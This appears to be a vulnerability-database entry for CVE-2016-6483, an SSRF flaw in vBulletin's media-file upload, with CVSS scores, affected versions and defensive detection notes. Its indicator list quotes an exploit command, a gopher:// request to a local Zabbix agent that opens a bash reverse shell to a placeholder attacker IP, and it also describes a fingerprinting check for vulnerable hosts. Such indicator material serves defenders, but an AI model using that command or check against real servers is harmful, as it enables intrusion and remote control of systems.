cbcvebase.
CVE-2016-6483
published 2016-09-02

CVE-2016-6483: The media-file upload feature in vBulletin before 3.8.7 Patch Level 6, 3.8.8 before Patch Level 2, 3.8.9 before Patch Level 1, 4.x before 4.2.2 Patch Level 6…

PriorityP263high8.6CVSS 3.0
AVNACLPRNUINSCCNIHAN
EXPLOIT
EPSS
11.95%
95.6th percentile
The media-file upload feature in vBulletin before 3.8.7 Patch Level 6, 3.8.8 before Patch Level 2, 3.8.9 before Patch Level 1, 4.x before 4.2.2 Patch Level 6, 4.2.3 before Patch Level 2, 5.x before 5.2.0 Patch Level 3, 5.2.1 before Patch Level 1, and 5.2.2 before Patch Level 1 allows remote attackers to conduct SSRF attacks via a crafted URL that results in a Redirection HTTP status code.

Affected

9 ranges
VendorProductVersion rangeFixed in
vbulletinvbulletin<= 5.2.6
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin

Detection & IOCsextracted from sources · hover to see the quote

url/link/getlinkdata
commandgopher://localhost:10050/1system.run[(/bin/bash -c 'nohup bash -i >/dev/tcp/<our_ext_ip>/<shell_port> 0<&1 2>&1 &') ; sleep 2s]
urlhttp://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt
  • Monitor POST requests to the vBulletin endpoint /link/getlinkdata containing a 'url' parameter pointing to an external or internal IP/host, which is the vector for SSRF exploitation.
  • Detect SSRF exploitation attempts where the server follows HTTP 301 redirects to internal gopher:// or telnet:// URIs targeting localhost services (e.g., Zabbix Agent on port 10050).
  • Alert on vBulletin server-initiated outbound connections to attacker-controlled hosts on port 8080 (default reverse shell callback port used by the PoC exploit).
  • The exploit requires the attacker's HTTP redirector to be reachable on port 80 or 443; detect vBulletin making outbound HTTP/HTTPS requests to external IPs as part of media-file URL fetching.
  • A POST request to /link/getlinkdata with no or empty 'url' parameter returns the string 'invalid_url'; use this as a fingerprinting check for vulnerable vBulletin instances.
  • ·The exploit's HTTP redirector must listen on port 80 or 443 to be accepted by vBulletin's media-upload URL validation; other ports will be rejected.
  • ·The default port scan range in the PoC is 20–90; attackers may extend this to 65535 for a full internal port scan.

CVSS provenance

nvdv3.08.6HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.